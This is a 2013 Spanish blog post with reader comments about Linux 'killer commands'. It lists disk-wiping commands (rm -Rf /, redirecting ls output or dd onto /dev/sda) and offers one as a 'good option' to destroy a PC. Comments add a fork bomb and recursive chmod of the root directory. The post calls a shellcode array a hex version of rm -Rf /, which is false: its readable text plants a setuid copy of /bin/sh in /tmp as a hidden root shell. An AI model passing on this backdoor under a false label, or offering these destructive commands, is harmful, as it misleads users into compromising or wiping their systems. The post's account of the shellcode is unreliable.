martes, 16 de julio de 2013

El mito de los comandos asesinos

Existen muchos mitos sobre los “comandos asesinos” en Linux. Supuestos comandos que son capaces de dejar inservible tu ordenador, obligándote a reinstalar y lo que es peor, haciéndote perder la valiosa información guardada en tu equipo y de la que por supuesto, no tendrás copia de seguridad actualizada.

Vamos a ver lo que hay de cierto y de falso.


El comando más famoso para destruir tu información es rm -Rf /. Literalmente el comando trata de borrar todo desde / de forma recursiva, con lo que dejaría tu disco duro vacio. Pero ¿realmente funciona?

Pues lamento decir a los fanáticos de la destrucción que no. Al menos en Debian 7, cuando tratas de ejecutarlo te responde que es peligroso y una directiva de seguridad lo impide. Lo malo del asunto es que también te dice la forma concreta de saltarte la protección.


Hermano del conocido rm, es su versión hexadecimal.

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esto no es más que la traducción al hexadecimal del comando rm -Rf /, por lo que el resultado es el mismo de antes.

Pero tranquilo, si quieres destruir tu pc, te vamos a dar una buena opción, ls -ah > /dev/sda.

Este inocente comando, lo que hace es sencillamente listar los archivos ocultos, pero enviando el resultado a /dev/sda en lugar de a tu monitor. Dicho de otra manera, destruirá la información del disco sda (generalmente el primer disco duro) sustituyéndola por un listado de archivos ocultos.

Pero aun así, no es tan sencillo. No obtendremos resultados directamente ni tan siquiera con sudo. Tendremos que logarnos como root para poderlo ejecutar “con exito”.



Si tenéis más comandos asesinos y queréis compartir vuestras experiencias con ellos, no dudéis en contarlo en los comentarios.  

15 comentarios:

  1. Respuestas
    1. Me alegro de que te guste, pero se bueno y no destruyas el disco de nadie
      :)

      Eliminar
  2. Me sorprende que no hables de dd, que es el comando destructor por excelencia.
    Un dd if=XXXX of=/dev/sda , hace virguerías de la destrucción

    ResponderEliminar
  3. ahh bueno yo me cargue mi archbang de la siguiente manera (supongo que tenia arreglo pero no lo encontre)
    sudo pacman -Rsn pacman
    bueno creo que asi era

    ResponderEliminar
    Respuestas
    1. Pero supongo que eso no lo dejaria totalmente inservible y aun podrias tratar de rescatar tus datos

      Eliminar
  4. Mmmm, que tal una bomba lógica:

    :(){:|:&};:

    salu2

    ResponderEliminar
  5. Bueno, rm -rf / no funciona. pero la version rm -rf /* si que lo hace ...

    ResponderEliminar
  6. El "chmod -R 777 /" o "chmod -R 000 /", no se si realmente funcionen

    ResponderEliminar
  7. Existe un error, ls -lh lista añadiendo la cantidad de Mb en formato humano, es decir, 1Mb y asi. Para listar los ocultos, como dice el articulo, es ls -la

    ResponderEliminar
    Respuestas
    1. Cierto, ha sido un lapsus
      En cuanto pueda lo corrijo
      Gracias

      Eliminar

prekes sodui